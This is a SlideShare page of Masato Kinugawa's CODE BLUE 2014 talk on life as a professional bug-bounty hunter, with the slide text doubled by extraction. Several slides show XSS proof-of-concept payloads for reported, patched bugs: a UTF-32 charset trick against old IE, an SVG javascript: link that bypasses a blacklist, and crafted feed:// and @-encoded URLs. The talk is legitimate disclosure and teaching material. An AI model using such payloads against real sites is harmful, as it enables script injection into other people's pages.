CODE BLUE 2014 : Joy of a bug hunter by Masato Kinugawa

8 209 vues

Publié le

Recently, The number of enterprise which pays rewards for reporting security bugs is increasing. I am also received a large amount of rewards through the reward programs for reporting bugs. Actually, I earn a living with rewards, so it is not exaggeration to say that I am a professional bug hunter. I will make a speech such as how to be a professional bug hunter, actual of rules from the point of view of a positive attendance and how to discover vulnerabilities including technical topics.

Publié dans : Carrière
0 commentaire
7 j’aime
Statistiques
Remarques
  • Soyez le premier à commenter

Aucun téléchargement
Vues
Nombre de vues
8 209
Sur SlideShare
0
Issues des intégrations
0
Intégrations
4 675
Actions
Partages
0
Téléchargements
75
Commentaires
0
J’aime
7
Intégrations 0
Aucune incorporation

Aucune remarque pour cette diapositive

CODE BLUE 2014 : Joy of a bug hunter by Masato Kinugawa

  1. 1. BBuugg--hhuunntteerr’’ss JJooyy Masato  Kinugawa  
  2. 2. Name Masato Kinugawa Nationality Japanese(maybe) Hobby Listening Music and XSS Profession BBuugg--hhuunntteerr
  3. 3. FFiirrsstt BBuugg--HHuunntteerr’’ss LLiiffee aanndd BBoouunnttyy PPrrooggrraamm SSeeccoonndd DDeelliigghhttffuull BBuuggss TThhiirrdd TThhee rreeaassoonnss wwhhyy II bbeeccaammee BBuugg--hhuunntteerr
  4. 4. BBuugg--hhuunntteerr’’ss LLiiffee aanndd BBoouunnttyy PPrrooggrraamm
  5. 5. Workplace Home Working Hours Any time I want Work Finding Security Bugs Income BBuugg BBoouunnttyy ➡Does it make enough money to live?
  6. 6. 2277113355334466 ((JJPPYY)) $$114422772233 (($$11 == 112200 JJPPYY))
  7. 7. 2277113355334466 ((JJPPYY)) $$114422772233 (($$11 == 112200 JJPPYY)) ((iinn OOccttaall ddiiggiittss))
  8. 8. ! GGooooggllee launched in 2010 ! Followed by MMaannyy CCoommppaanniieess
  9. 9. ! GGooooggllee VVulnerability RReward PProgram ! 1 bug = $100~20,000 $$113300,,880033..77 TToottaall BBoouunnttiieess NNuummbbeerr ooff bbuuggss rreeppoorrtteedd 112277((119911 including duplicated and/or not rewarded ones)
  10. 10. EEvveenn mmoorree mmoottiivvaatteedd bbyy tthhee iinnccrreeaasseedd bboouunnttyy rraatteess!!$  
  11. 11. II aamm aaccttuuaallllyy nniigghhtt oowwll……
  12. 12. ! QQuuiicckk RReeppoossee since the program is launched. ! CCoonnssiiddeerr NOT ONLY seriousness, but also tthhee lleevveell ooff ““iinntteerreessttiinngg””,, ooff tthhee bbuugg.. ! Require only ssiimmppllee eexxppllaannaattiioonn ttoo hhaavvee tthheemm uunnddeerrssttaanndd tthhee pprroobblleemm.. ! PPrroovviiddee ffuunn to the reporters.
  13. 13. ! TThhee MMoosstt IImmppoorrttaanntt DDoommaaiinn ooff GGooooggllee ! Bounty was $$55,,000000 (Exceeds the regulated maximum amount at that time)
  14. 14. https://accounts.google.com/example?oe=utf-‐‑‒32   HTTP/1.1  200  OK   Alternate-‐‑‒Protocol:  443:quic,p=0.01   Cache-‐‑‒Control:  private,  max-‐‑‒age=0   Content-‐‑‒Encoding:  gzip   Content-‐‑‒Type:  text/html;  charset=UTF-‐‑‒32   ...   ! Character Code can be set by URL ! UUTTFF--3322 was able to be set
  15. 15. ∀㸀㸀㰀㰀script㸀㸀alert(1)㰀㰀/script㸀㸀�
  16. 16. ➊➊ AArrrraayy ooff tthhee BByytteess ❷❷ CChhaarraacctteerr CCooddee ooff tthhee PPaaggee ❸❸ HHaannddlliinngg 00xx0000 CChhaarraacctteerrss
  17. 17. 00  00  22  00  00  00  3E  00  00  00  3C  00   00  00  00  73  00  00  00  63  00  00  00  72   00  00  00  69  00  00  00  70  00  00  00  74   00  00  3E  00  00  00  00  61  00  00  00  6C   00  00  00  65  00  00  00  72  00  00  00  74   00  00  00  28  00  00  00  31  00  00  00  29   00  00  3C  00  00  00  00  2F  00  00  00  73   00  00  00  63  00  00  00  72  00  00  00  69   00  00  00  70  00  00  00  74  00  00  3E  00   ∀㸀㸀㰀㰀� s  c    r� i    p    t� 㸀㸀a    l� e  r    t� (  1    )� 㰀㰀/    s� c  r    i� p  t  㸀㸀� In UTF-32, 1 character requires 4 bytes ➊�
  18. 18. IE  does  not  support  UTF-‐‑‒32    ➡Character  Code  shall  be  “recognized”  to  be   something   00  00  22  00  00  00  3E  00  00  00  3C  00   00  00  00  73  00  00  00  63  00  00  00  72   00  00  00  69  00  00  00  70  00  00  00  74   00  00  3E  00  00  00  00  61  00  00  00  6C   00  00  00  65  00  00  00  72  00  00  00  74   00  00  00  28  00  00  00  31  00  00  00  29   00  00  3C  00  00  00  00  2F  00  00  00  73   00  00  00  63  00  00  00  72  00  00  00  69   00  00  00  70  00  00  00  74  00  00  3E  00   ∀㸀㸀㰀㰀� s  c    r� i    p    t� 㸀㸀a    l� e  r    t� (  1    )� 㰀㰀/    s� c  r    i� p  t  㸀㸀� ❷
  19. 19. This “super great” web site provides the support status of character codes, of all web browser http://l0.cm/encodings/table/
  20. 20. IE(<=9) ignores the characters ➡the “00” are uunnddeerrssttoooodd aass nnootthhiinngg.. 00  00  22  00  00  00  3E  00  00  00  3C  00   00  00  00  73  00  00  00  63  00  00  00  72   00  00  00  69  00  00  00  70  00  00  00  74   00  00  3E  00  00  00  00  61  00  00  00  6C   00  00  00  65  00  00  00  72  00  00  00  74   00  00  00  28  00  00  00  31  00  00  00  29   00  00  3C  00  00  00  00  2F  00  00  00  73   00  00  00  63  00  00  00  72  00  00  00  69   00  00  00  70  00  00  00  74  00  00  3E  00   �  >  �� s  c    r� i    p  t� >  a  l� e  r    t� (  1    )� �  /  s� c  r    i� p  t  >� ❸
  21. 21. Message from the web page
  22. 22. Seek browser and plug-in bugs also ������1������� ������1������� ������1������� ������1������� ������1������� ������1����1�� ������1��1���� ������11������ ������1������� ������1������� ������1��1���� ������1����1�� ������1���1��� ������1�������������11������ ������11������ ������1����1�� ������1�����1� ������1������� ������1������� ������1����1�� ������1������� ������1������� ������1������� ������1������� ������1�������
  23. 23. ! 2288..77%% of total number of bugs I reported ! TThhee 8877%% ooff tthheemm aarree wwiitthh IIEE
  24. 24. ! Take longer to fix ! Even if it is fixed, it is NOT likely to applied to the different IE version. Something is required at the Web service level Therefore
  25. 25. location.href is aa mmeetthhoodd ttoo ggeett tthhee UURRLL ooff tthhee ppaaggee by JavaScript http://example.com/ http://example.com/ location.href
  26. 26. http://evil%2F@eexxaammppllee..ccoomm/ location.href is http://eevviill/@example.com/ The URL part before @ is aauuttoommaattiiccaallllyy ddeeccooddeedd!! ➡IItt ggeenneerraatteess UURRLL ppooiinnttss ttoo eexxtteerrnnaall WWeebb ssiittee
  27. 27. AAllll ccooddeess iinncclluuddee llooccaattiioonn..hhrreeff ppooiinnttiinngg ttoo sseellff--ddoommaaiinn aarree ppootteennttiiaallllyy vvuullnneerraabbllee Added characters before “@”, then checked any web pages if it send request to the external sites Therefore
  28. 28. http://evil%2F@www.youtube.com/  
  29. 29. ! Found ffaattaall bbuugg, at same time ! Exist in feed:// URL that represents RSS ! Can extract unrelated feed to any domain by ccuussttoommiizziinngg the part of URL before @. ! Put the scripts in the unrelated feeds, XSS works on the extracted domain WWee ccaann eennffoorrccee XXSSSS oonn aannyy wweebb ssiitteess \\((^^oo^^))// yyeeaahh☆☆ therefore
  30. 30. In feed:// URL, characters which can run scripts are restricted. (=Blacklist) It is easy; jjuusstt ppaassssiinngg tthhrroouugghh tthhee bbllaacckklliisstt! Things to do
  31. 31. <a href="javascript:alert(1)">XSS</a> <a>XSS</a> FFiinndd oouutt tthhee cchhaarraacctteerrss wwhhiicchh ccaann ppaassss tthhrroouugghh bbaasseedd oonn tthhee cchhaarraacctteerr rreemmoovvaall ppaatttteerrnn BBeeeeppiinngg!!
  32. 32. <svg>
 <a xmlns:xlink="http://www.w3.org/1999/xlink"
 xxlliinnkk::hhrreeff==""jjaavvaassccrriipptt::aalleerrtt((11))"">
 <rect width="1000" height="1000" />
 </a>
 </svg> SSiilleennccee……
  33. 33. feed://l0.cm%2Fcb.rss%3F@codeblue.jp/  
  34. 34. feed://l0.cm%2Fcb.rss%3F@codeblue.jp/   alert('CODE  BLUE、2回⽬目開催おめでとう!n'+   document.domain+'から')   (Congratulation  for   the  2nd  Code  Blue)  
  35. 35. ! Web applications are in jeopardies caused by character codes, browser behaviors / bugs, and so on… ! Finding out mysteriously complicated bugs is tthhee uullttiimmaattee ddeelliigghhtt.. You want to see more? http://masatokinugawa.l0.cm/
  36. 36. ! Grow up in touch of computers. ! Love to disassemble anything ! Debut as XSS “attacker” in the 6th grade
  37. 37. ! Grow up with in touch of computers.  ➡  I  got  to  knew  what  is  binary  in  2009   ! Love to disassemble anything    ➡  Donʼ’t  love  to  do  (so  lot)   ! Debut as XSS “attacker” in the 6th grade    ➡  I  got  interested  in  security  in  2009  
  38. 38. Decided to ddoo wwhhaatt II wwaanntt,, iinn mmyy wwaayy ��������������������� ~2009 A lot happened  2010 Left computer vocational school
  39. 39. What  I  want  to  do:  Seeking  vulnerabilities   FFoouunndd ssoo lloott!! Soon after, GGooooggllee llaauunncchheedd bug bounty program Spent all waking hours to find vulnerabilities.
  40. 40. Bug  hunting  house-‐‑‒husband?      ➡  Need  to  gain  girl  hunt  skill  also  ☺   ! Extension  of  what    I  want  to  do   ! Found  my  self  as  bug̶—hunter,  one  day   WWiisshh ffoorr ffuuttuurree……
  41. 41. ! Must spent most of the time to repeating unsophisticated verification test ! No income unless find anything ! FFeeeelliinngg aaccccoommpplliisshhmmeenntt iiss ggrreeaatt, as what I achieved, directly become money ! NNootthhiinngg iinn tthhee wwoorrlldd ttoo ffeeeell ddeelliigghhtt like treasure hunting. ! Abnormal behaviors are mmuucchh ffuunn ttoo sseeee However…
  42. 42. TThhee ffiinnddiinngg sskkiillll iiss aallll wwhhaatt yyoouu nneeeedd Can concentrate on to improving skill CCaann ddoo bbyy yyoouurrsseellff Almost no human relationship issue CCaann ddoo aatt yyoouurr hhoommee No commuting time CCaann wwoorrkk aatt oowwnn ppaaccee Can do when you want
  43. 43.  “Listen music” as a hobby  “Bug-hunt” as a hobby (same as above) ““HHoobbbbyy”” Do anything you want! Then, you may find your own way. FFoorr tthhoossee wwhhoo aarree ttrryyiinngg ttoo ffiinndd yyoouurr wwaayy......
  44. 44. UUnnddeerrssttoooodd??!!
  45. 45. Thank  You!   @kinugawamasato   ✉   masatokinugawa  [at]  gmail.com   Contact  

×